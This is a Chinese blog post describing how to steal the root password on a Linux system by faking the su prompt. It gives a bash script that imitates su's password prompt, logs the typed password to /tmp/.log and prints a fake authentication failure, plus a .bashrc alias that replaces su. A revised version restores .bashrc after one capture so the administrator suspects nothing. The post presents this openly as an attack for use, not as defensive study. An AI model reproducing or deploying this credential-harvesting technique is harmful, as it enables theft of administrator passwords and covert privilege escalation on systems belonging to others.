shell 脚本里su密码_Linux OS以低权限用户抓取切账户时的密码

9fe1f6eabe8ef1ba9862fb700f4d6ced.png

2088952e8e45f09289d396a985dd9930.gif

目的:抓取切用户时输入的密码(即在su root时窃取用户密码)。

操作步骤

先伪造一次认证,首先观察在 su - root 时,正常的回显

21836bf0ba776e6b236c43f56b28e5f2.png

修改su命令 -- att.sh脚本

#!/bin/bashecho -e "Password: c"read -s passecho $pass >> /tmp/.logecho ""echo "su: Authentication failure"

执行脚本,如下图

ff037be100380685221b4b4f36a825cb.png

可以看到没有任何区别,然后备份该用户的 .bashrc 文件

cp -p .bashrc /tmp/.bashrc

修改用户的 .bashrc 文件,添加一条别名

alias su='./att.sh'

测试一下,成功

acc012f3b408687d7a98b1fc5fb73c63.png

然而这里存在一个问题,目前这个状态,认证始终无法成功,会影响到管理员的正常的操作,从而会引起管理员的警觉,所以需要修改为抓取一次密码后,恢复为正常的 su 脚本。

(代码如下)

#!/bin/bashecho -e "Password: c"read -s passecho $pass >> /tmp/.logecho ""echo "su: Authentication failure"#还原原始的.bashrc 启动新的终端,su命令被还原cp -p /tmp/.bashrc .bashrcrm /tmp/.bashrcbash

接着只需按照以上步骤再测试一次即可,最后su命令会还原正常,密码也会被成功记录下来。这样的话,管理员在第一次切换用户失败时,只会怀疑是自己输入密码错误导致,第二次输入密码会正常,这样不会引起管理员的怀疑。

■ Over ■

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值